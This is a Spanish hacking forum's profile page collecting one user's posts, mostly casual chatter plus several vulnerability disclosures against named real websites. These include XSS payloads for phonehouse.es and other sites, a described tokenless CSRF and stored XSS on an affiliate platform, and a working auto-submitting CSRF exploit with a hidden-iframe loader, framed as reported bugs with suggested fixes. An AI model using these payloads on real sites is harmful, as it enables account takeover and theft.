Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Mensajes - Matabarras

Páginas: [1] 2 3 ... 7
1
Es normal que si empiezas a llenar la ram todo el rato y siga y siga, deje de responder el ordenador, igual que cuando haces un bucle infinito en php seguramente te colapse el navegador.

Es algo lógico es como si me pongo a darte puñetazos infinitamente en algun momento te caeras.
O como cuando realizan un ataque ddos si el servidor no deja de recibir muchas peticiones en breve tiempo en algun momento caera.

2
Bueno, estaba algo disgustado con pccomponentes y me fije en las afiliaciones.

http://afiliados.pccomponentes.com/registro.html
La cual utilizaremos para logear a effiliation y para registrarnos.


Bueno, sabia que esto estaba vinculado a una web francesa de afiliaciones, effiliation.com
Entonces dije bien no pasa nada de nombre y descripción pondre un simple vector en xss, "><img src=x onerror=prompt(2)>

Pondre un correo temporal usare emailtemporal.org y listo , por si hace falta confirmar algo.

Me encuentro que email temporal si recibe un correo con un vector xss , pum te lo ejecuta y ya..
En este caso no solo es por el vector si no porque el contenido se envia como html y nada ejecuta el html del correo, pero esto no es lo grave aunque en parte si

(Podemos detectar si se usa emailtemporal por su extension, y siempre que se use añadir un pequeño poc de redirección para obtener datos y infinitas cosas a el usuario que utilize ese correo asi que ya no es tonteria.)

Lo más grave de emailtemporal vendra luego..

Bueno algo que me encuentro de "camino" como aquel que dice, volvamos a effilation pero claro una vez me logeo con el nombre de usuario, NO mi nombre que es un vector xss, pues effiliation me refleja el xss cada vez que recargo la web, comente algo, haga lo que haga, a todos les reflejare mi XSS.



Si puse elladodelmal como sitio web a modo troll.


Tambien nos damos cuenta que en la  dirección de reenvío por omisión, si colocamos un vector xss tambien los ejecutara, oh my god esta web no filtrada nada(?).


Sisi, ni siquiera cuando colocas la contraseña nueva te la pone en asteriscos, ni siquiera eso..

Tambien obtenemos un CSRF en effiliation.com
http://www.effiliation.com/affiliev2/secure/profile.html?tab=identifiants

Para toda la gente que tenga cuenta en ella y este iniciada como ya sabeis con un CSRF podemos cambiar la clave, debido a que cuando realizas la petición no lleva ningun token, ni siquiera te pide que pongas la contraseña actual.

Tengo ganas de dormir y no e echo el poc, pero vamos que se hace en menos de 5 minutos, y si alguien lo quiere puedo hacerlo.

Que guay es una web donde se gana dinero por afiliaciones, pero nada aqui cualquiera puede usurpar la cuenta de cualquiera..

Claro podemos usurpar la cuenta, o directamente meterle un XSS en el dirección de reenvió por omisión y hacer uso de BEEF, no se que seria peor no?.


Está bastante claro que no ofrece protección alguna a los clientes , aparte de tener repleto de XSS Y CSRF, pudiendo cambiar tambien la cuenta bancaria y demas donde recibir el dinero..


Y voy a parar... porque me estoy empezando a cabrear  bastante, y no quiero hacer nada malo :D
 
Pero espera, emailtemporal  si tiene un xss seguro hay algo más, que petición hace cada vez que abro un mensaje?



Si efectivamente dicen borrar todos los mensajes, y demas , si quizas los borren pero tardaran bastante pues tengo más de 1954227 mensajes que puedo mirar ahora mismo, y siguiendo.. debido a una falta de verificación y si nos deja utilizar la acción de ver mensajes, tambien nos deja utilizar otras acciones y hay lo dejo.

Hasta aqui hemos llegado y espero que les haya gustado esta pequeña anecdota que de seguir seguro nunca acabaria.

PD: Al reportar ahora a emailtemporal, en el contacto si nos fijamos podemos bombardearle el contacto con el mismo mensaje todo el rato, pues se envia y no te muestra ningun captcha en ningun momento y puedes enviarlo las veces que quieras.

3
Hacking ShowOff / [IFXSS]Yourjavascript.com
« en: Junio 12, 2016, 10:15:30 pm »
Bueno aunque no es nada importante, mientras miraba unas cosas me lo vi y aqui lo dejo, y bueno el host es bastante util.


Vector: "<h1 onclick=alert("Matabarras")>

Reportado: Al correo de paypal de donaciones.

4
Off Topic / Re:Serie Mr.Robot
« en: Junio 10, 2016, 04:48:37 pm »
Excelente serie. Hace 2 dias acabe de verla, a mi me gusto. Para entenderla hay que verla desde el principio.

Estoy a la espera de la segunda temporada que creo que sale en julio.

Enviado desde mi SGH-M919 mediante Tapatalk
Yo ya la he visto ahora en 2 dias y esta bastante bien, aunque algo paranoica y confusa, ojala salga en julio la 2.

5
Back-end / Manual PHP Instructivo Okol.
« en: Junio 10, 2016, 10:47:29 am »
Les dejo aqui un manual que hizo Okol, hace unos años ya, para strikegeek que era un blog de sanko y mio pero que por  x motivos se dejo, no se si okol lo público alguna vez.



Descarga: https://www.sendspace.com/file/2q3ep1

Si el nombre es test.pdf, no recuerdo el porque lo tengo así en un disco duro  :o

6
Off Topic / Re:Serie Mr.Robot
« en: Junio 09, 2016, 09:38:14 am »
Voy a verla, pinta bien, y les dejo otra aunque no tenga que ver con la informática pero si con la magia y ami me encanta.
The Magicians.  ;D

7
Bugs y Exploits / Re:Vulnerabilidad MS14-066 - SChannel (SSL)
« en: Mayo 08, 2016, 08:59:29 pm »
Desgraciadamente no puedo ayudarte a como montar el exploit debido a mi falta de inglés, yo tampoco he conseguido montarlo por que las instrucciones al ser traducidas por Google pierden un poco la lógica y se hacen dificil de entender, alguien debería hacer un post específico sobre como montarlo, si consigo más información será trasmitida por este post.
Habia que poner los dos comandos que te pone:
nasm -fwin32 IATLess.asm
link /subsystem:windows /entry:start IATLess.obj

Guardando antes en asm, el exploit( https://www.codeandsec.com/files/IATless.asm.txt ) como nombre IATLess.asm

Igualmente el autor ya ha puesto en la web el compilado,gracias por compartir.
Puesto es mejor compilarlo uno mismo, si no quieres que cuando lo pruebes se guarde en c:\windows\virus.exe por ejemplo xD

8
Hacking ShowOff / Re:XSS Thephonehouse
« en: Abril 13, 2016, 04:27:50 pm »
Que va, empeze hace una semana en esto ahora descubri el havij.

9
Hacking ShowOff / XSS Thephonehouse
« en: Abril 05, 2016, 02:08:59 pm »
Quería comprar un móvil y ..


Vector: http://www.phonehouse.es/compra/carrito/ver.html?productadd=32136-%22%3E%3Cimg%20src=x%20onerror=confirm%28%27Matabarras%27%29;%3E

Reportado? Si
La encontre el 15 de marzo,pero al fin hoy vi que lo arreglaron.
Fixeado? Si.

Agradecimiento? No  :-\ :'(

10
Hacking ShowOff / Re:[CSRF]Scanner Underc0de
« en: Marzo 15, 2016, 08:00:11 pm »
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

Mmm... mala porque? Ahí si que me pillas
Basicamente como ya paso en más sitios donde reporte vulnerabilidades en ese caso fue una Cross site Scripting, gracias a una xss en un uploader , resumiendo  podia subir archivos con extensión inventada (.test) cuando accedias a ellos se ejecutaban como html, por lo tanto lo que hice fue redirigir el mismo sitio para robarle las cookies del DOMINIO, entonces obtenia la del foro smf , que era el dominio principal. Si el uploader no hubiera sido un subdominio, en ningun momento hubiera tenido acceso a las cookies del dominio principal que en este caso eran SMF.

Ahora me pillas tú?

11
Hacking ShowOff / Re:[CSRF]Scanner Underc0de
« en: Marzo 01, 2016, 05:06:39 pm »
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

12
Hacking ShowOff / [CSRF]Scanner Underc0de
« en: Febrero 29, 2016, 10:37:00 am »
Url: scanner.underc0de.org

Código: [Seleccionar]
<?php
//Codded: Matabarras
$url "scanner.underc0de.org"//url
//Parametros post que modificaremos :D
$form["password"] = ""//Dejamos el valor así debido a por defecto ya coge el valor del pwd.
$form["email"] = "[email protected]"//cambiamos el correo por el que queramos
$form["fname"] = "meaburro"//nombre
$form["lname"] = "vayavaya"//apellidos
$form["newsletter"] = 0//recibimos noticias 0 deshabilitado, 1 habilitado
$form["doupdate"] = "";
$form["processUser"] = 1;





echo 
'<html><body onLoad="document.csrf.submit();">';
echo 
'<form name="csrf" action="http://'.$url.'/ajax/controller.php" method="POST">';
foreach(
$form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo 
'</form></body></html>';
?>


Camuflar el csrf, easy.

Código: [Seleccionar]
// This code was coded by FrenetikK & Matabarras.


function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');

Index
Código: [Seleccionar]
<script src="a.js"></script>
Soluciones:

- Solución fácil desactivar que se tome por si la contraseña.
- Solución fácil utilizar un catpcha decente como recaptcha.
-Solución fácil utilizar un referer(esto aun así seria bypasseable).
-Solución correcta, utilizar un token para cada cuenta y para cada petición.

Reportado? Si
Fixeado? Si pero no adecuadamente.



13
Seguridad Wireless / Re:[Breve TUTORIAL] Uso de Linset
« en: Agosto 05, 2015, 08:52:45 am »
Hola tengo el siguiente problema con LINSET..



No me detecta la placa de red wifi USB.. Pero al ingresar airmon-ng figura normalmente..

Alguna solución? Gracias.
Entonces ya es cosa de Linset que no reconoce tu tarjeta de red, yo usando la alfa rtl8187 me la detectaba bien, cosas que suelen pasar.

14
Presentaciones / Re:Xop Xop!
« en: Febrero 25, 2015, 08:36:22 pm »
miren, volvió mr. traidor

el señor que spamea en el foro, mete púa en el twitter y con un foro fracasado.

Bienvenido!

Hola no se quien eres, un wannabes más supongo, y fanatico que sigue mi twitter y el de snifer, y no tengo foro propio, pero si participaba uno que cualquiera de los dos que administraba conmigo, tendrias que besarle los pies para que te enseñaran algo de programación(?)
Bienvenido(?) quien dice que vaya a participar por el foro, solo salude a algunos, en los que no te encuentras tú fan mio.  :-* :-* :-* :-* ;D

15
Presentaciones / Xop Xop!
« en: Febrero 24, 2015, 10:21:38 am »
Hola! que tal todos, espero que bien les sigo leyendo siempre  ;D

16
Delphi / Anotadores en Delphi [Open Source]
« en: Octubre 12, 2014, 07:42:54 pm »
Aqui el de metal_kingdom , solo es abrirlo y se guarda solo.
Código: Delphi
  1. program anotator;
  2.  
  3. var
  4.   S: textfile;
  5.  
  6. begin
  7.   AssignFile(S, 'func.txt');
  8. {$I-} // No mostramos errores I/O para evitar msgboxes innecesarios.
  9.   append(S); // intentamos escribir en fichero existente.
  10. {$I+} // Vemos errores para comprobarlos
  11.   if IOResult <> 0 then // [0 = Fue bien] Si el resultado no fue bueno al comprobar entonces ..
  12.     rewrite(S); // si no se pudo entonces creamos archivo.
  13.   WriteLn(S, paramstr(0)); // escribimos ruta completa del archivo en nueva línea.
  14.   closefile(S); // cerramos archivo.
  15. end.

Aqui el que hice yo ya hace, lo hice para que se anotara al cliquear.
Código: Delphi
  1. unit Unit1;
  2.  
  3. interface
  4.  
  5. uses
  6.   Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  7.   Dialogs, StdCtrls;
  8.  
  9. type
  10.   TForm1 = class(TForm)
  11.     boton: TButton;
  12.     procedure botonClick(Sender: TObject);
  13.     procedure FormCreate(Sender: TObject);
  14.   private
  15.     { Private declarations }
  16.   public
  17.     { Public declarations }
  18.   end;
  19.  
  20. var
  21.   Form1: TForm1;
  22.   myFile : TextFile;
  23.   text   : string;
  24.   sFileName : string;
  25. implementation
  26.  
  27. {$R *.dfm}
  28.  
  29. procedure TForm1.botonClick(Sender: TObject);
  30. begin
  31. sFileName:= ExtractFileName(Application.ExeName);
  32.  
  33.  
  34.  
  35.    AssignFile(myFile, 'Funcionales.txt');
  36.    Append(myFile);
  37.  
  38.    WriteLn(myFile, sFileName);
  39.  
  40.    CloseFile(myFile);
  41.  
  42.    Reset(myFile);
  43.  
  44.    CloseFile(myFile);
  45.  end;
  46.  
  47. procedure TForm1.FormCreate(Sender: TObject);
  48. begin
  49.     AssignFile(myFile, 'Funcionales.txt');
  50.     ReWrite(myFile);
  51.     CloseFile(myFile);
  52. end;
  53.  
  54. end.

El codigo de metal_kingdom  es más corto,  y mejor.

Simplemente este post es una excusa para saludarles y espero que les vaya todo bien, saludos!  ;D

17
Python / Re:Zarp - Network Attack Framework
« en: Julio 22, 2014, 08:37:13 pm »
Ten en cuenta una cosa, la mayoria de scripts de antes, ya no corren en terminal bien con python 3 da bastantes errores de compatibilidad y movidas así.

Yo en manjaro para la mayoria de cosas que tengo en py , tengo que usar el comando python2 , que equivale a la versión 2 (o 2.7 (?) ) no lo se seguro, para que esten compatibles  ;D

18
Off Topic / Re:Votá al troll del año!
« en: Julio 22, 2014, 08:34:13 pm »
Voto por snifer, el nacio troll  :-* :-[

19
Ya no furula para ello puedes hacer uso de pwcrypt de SBD, la cual ya fue liberada lo unico que necesitas es tener la cuenta de gmail o xXX que fue casada con la creación de whatsapp y listo!.

Regards,
Snifer

Exacto después de las ultimas actualizaciones jodieron xD

20
Sysanalizer, de los mejores o Systracer  ;D

Páginas: [1] 2 3 ... 7